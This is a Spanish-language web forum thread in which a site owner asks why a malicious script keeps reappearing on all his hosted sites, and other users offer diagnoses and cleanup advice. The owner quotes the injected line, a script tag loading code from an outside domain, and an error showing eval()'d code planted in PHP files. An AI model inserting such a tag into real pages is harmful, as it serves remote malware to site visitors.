Todos mis sitios alojados en mi hosting aparecen con un script malicioso

[wcd]

Desde hace unos 3 dias, veo que un script malicioso esta en todos los sitios web alojados en mi hosting, absolutamente todos, consulte al proveedor y me dice que la seguridad no es responsabilidad de el, que es mia, sin embargo, cuando termino de eliminar todo, aparece nuevamente el script, ¿a que podrá deberse?

este es parte del script
</head>
<script src=http://ozguvenplastik.com/images/image.php ></script><body bgcolor="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<!-- ImageReady Slices (intro) -->

al buscar esa url, es un sitio penalizado por google!!

[moyo18]

si eso veo, mira y con q lo has creado el sitio ??

cambia el password del cpanel o plesk de tu dominio.

si usas algun script para el stio hazle un update y revisa logins a tu cuenta ya sean via ftp o via panel de control para ver q ondas.

[Battousai]

Que el proveedor no es responsable sobre eso?  Que se han fumado, Que proveedor es ?

Es cierto que tú tienes que tener un cierto grado de responsabilidad de tener todos tus scripts actualizado pero no le veo la manera que todo el cargo te lo tiren a ti.

Y a todo esto

Que paginas son?
Que scripts son?
Has actualizado esos scripts?

Se me hace muy raro si dices que borraste el contenido de tu folder y vuelve aparecer entonces ya eso no está en tus manos  y eso ya le corresponde a tu “proveedor”, algún rootkit/ LKM's/worm debes de tener o el host lo tiene.

[moyo18]

“proveedor”, algún rootkit/ LKM's/worm debes de tener o el host lo tiene.

si lo mismo pense yo.

es bien raro lo q t pasa , y el cierto lo q t dice battousai, hay cierta seguridad que tenes q mantener vos, pero si llega a los extremos q borras todo lo del folder www y aun asi aparecen script malicios entonces ahi es onda del proveedor.

seria bueno q dijeras kienes son y q les escribiera un ticket diciendoles lo q sucede.

[wcd]

fijense que el proveedor me dice que la seguridad del host es mi responsabilidad, por lo tanto limpiarlo tambien es mia.

[wcd]

Miren lo curioso de este asunto es que todos los archivos .php son afectados asi como los index.html, me carga un codigo encriptado.. lo quito y luego aparece.. lo mas raro es que tengo 2 cuentas de hosting una de hostmonster y otra de hostgator y las dos estan igual.. no entiendo.. ya modifique los permisos de las carpetas.. password y sigue el problema

[moyo18]

que script usas para tu ewb, o la hiciste a mano o usaste algnu programa q bajaste d internet ?

[Battousai]

fijense que el proveedor me dice que la seguridad del host es mi responsabilidad, por lo tanto limpiarlo tambien es mia.

ROFLMAO.

Ah que buen chiste xD.

Bueno después de tener un momento de alegría vamos serio tú asunto.

Todavía no dices que script usas y mucho menos cuales son los sitios. Pero asumo que son tu tres sitios el de ventas el blog y el turismo pero no entiendo la verdad he visitado esas páginas y no veo nada de scripts raros veo las paginas “limpias”.

Insisto con lo del proveedor, el es que te tiene que solventar el problema tuyo nadie más, como te van a decir que tu lo solventes si sos un simple usuario NO PODES HACER NADA, lo único que podes hacer es borrar el sitio y subirlo denuevo NADA MAS Y MENOS, yo en lo personal ninguno de los dos sitios me agrada yo lo siento pésimos y overseller a morir, pero se me hace un poco también extraño que no te quieren ayudar o solventar tu problema si dicen que ellos son un “soporte top notch” enserio muy raro en fin.

Una cosa me llamo la atención y es que en tus dos proveedores te pasa lo mismo entonces estoy pensando que el virus lo tienes tu en la computadora y no en el hosting has hecho algo en especial hace 3 dias?.

[obser7er]

Insisto con lo del proveedor, el es que te tiene que solventar el problema tuyo nadie más, como te van a decir que tu lo solventes si sos un simple usuario NO PODES HACER NADA, lo único que podes hacer es borrar el sitio y subirlo denuevo NADA MAS Y MENOS

Simple... él tiene que solventar el problema porque todo apunta a que el mismo es su proveedor:
http://www.pixeonetworks.com/

Recien inscrito andaba queriendo comprar una cuenta de reseller y allí están las consecuencias... hasta cierto punto gracioso, porque pretende vender sitios web(se acuerdan del blog de la fiebreporcina.com o algo así ) y no sabe como asegurar los servicios que presta.

[wcd]

te equivocas obser7er, mis proveedores son hostgator y hostmonster, de hecho, clasigangas.com ya edite algunos archivos php, los sitios infectados son:

Por hostgator son:
www.hotelizalco.com
www.clasigangas.com


Por hostmonster son:
www.camprosal.com.sv
www.zifet.com
www.adesal.com.sv
www.anamariasalon.com

Pixeo networks es un tercer proveedor, de hecho por eso el blog de turismo no tiene problemas, vean el codigo fuente.. ahi aparece el script.. si queria comprar un reseller recien inscrito era porque queria aprender.. y queria algo robusto..

Bueno al punto.. los ultimos 3 dias no he hecho nada, de igual forma www.juepuya.com alojado en hostmonster.com tambien tiene ese problema y creo que es la misma fuente de ingreso del script malicioso, segun esta fuente que he encontrado
http://www.nimiedad.com/2009/05/grave-vulnerabilidad-en-foros-smf.html

Y por el lado de hostgator es www.poneteenalgo.com  Vean los codigos fuentes.. creanme que ya no encuentro que hacer.. borro unas cosas y las reparo.. al rato otra vez igual..


El proveedor no ayuda, hasta lo amenace.. dicen que en los terminos y condiciones esta eso detallado.. pero bueno..

Y la mayoria de las instalaciones de los sistemas las hago con el instalador fantastico.. para lo unico que lo hago todo desde 0 y a mano.. ejjeje es www.anamariasalon.com, por lo tanto estoy bien jodido.. vean los sitios y comprueben que estan emproblemados.. el mismo error todos..


Fatal error: Cannot redeclare ebzt2() (previously declared in /home2/vidateoc/public_html/adesal/index.php(1) : eval()'d code:1) in /home2/vidateoc/public_html/adesal/wp-config.php(1) : eval()'d code on line 1

[obser7er]

Igualmente, si el problema es el código del sitio, y no una falla de seguridad en la consola de administración, no son los proveedores del hosting lo que tienen que resolverlo, sino el programador/diseñador del sitio que es quién Sobre todo si son dos proveedores distintos, al parecer hostgator es de Australia y el otro de EEUU, es más probable que como ya te encaminó moyo, el problema sea parte del código de tu sitio y otra omisión de parte tuya.

[fastlane]

Examina todos tus sitios con esta utilidad http://www.unmaskparasites.com/, podras tener mas datos del problema.
Tambien si tenes AV en tu panel de control del hosting deberias de ejecutarlo.
Otra cosa que podrias hacer es restaurar un backup y cambies los permisos de los archivos de 644 a 444 para que no se te infecten nuevamente.

[wcd]

Gracias fastiane, hare eso!

[Reptile]

Utilizas un contador de visitas gratuito? asi como statcounter.com o motigo?

Resulta que al pasar de cierto número de visitas estos sitios (no se si intencionalmente o no) empieza a generar publicidad invasiva desde su propio código (el que te dan para que incrustes en el sitio).

Algunas veces te ponen un script en el php, otras veces un iframe

[moyo18]

hostgator y ostmonter tienen av corriendo en los servidores, para mi puede ser lo q dice reptile, a veces lo q parece ser gratis nos lleva otra cosa especialmente si no sabes lo que estas agregando a tu web con los scrpits q pones de otras webs.

diles a los de hostgator y el otro que t hagan un full restore de tu web si es posible de un mes antes d el problema, perderas cosas pero sera mejor o si tienen tu uno hazlo.

luego revisa cada pedazo de codigo que has argegado ed otras webs cmoo contadores, o plugins o no se depende de q scripts usaste para tu web.

esto es muy comun en estos dias ya que el malware esta en todos lados y ahora con un simple serevr hackeado o una web con suficientes  visitas puede propagarse como no tienes idea.

tambien has lo q dicen de cambiar los permisos de carpetas eso es bueno hacerlo siempre ya que no sabes que se puede subir en tu server.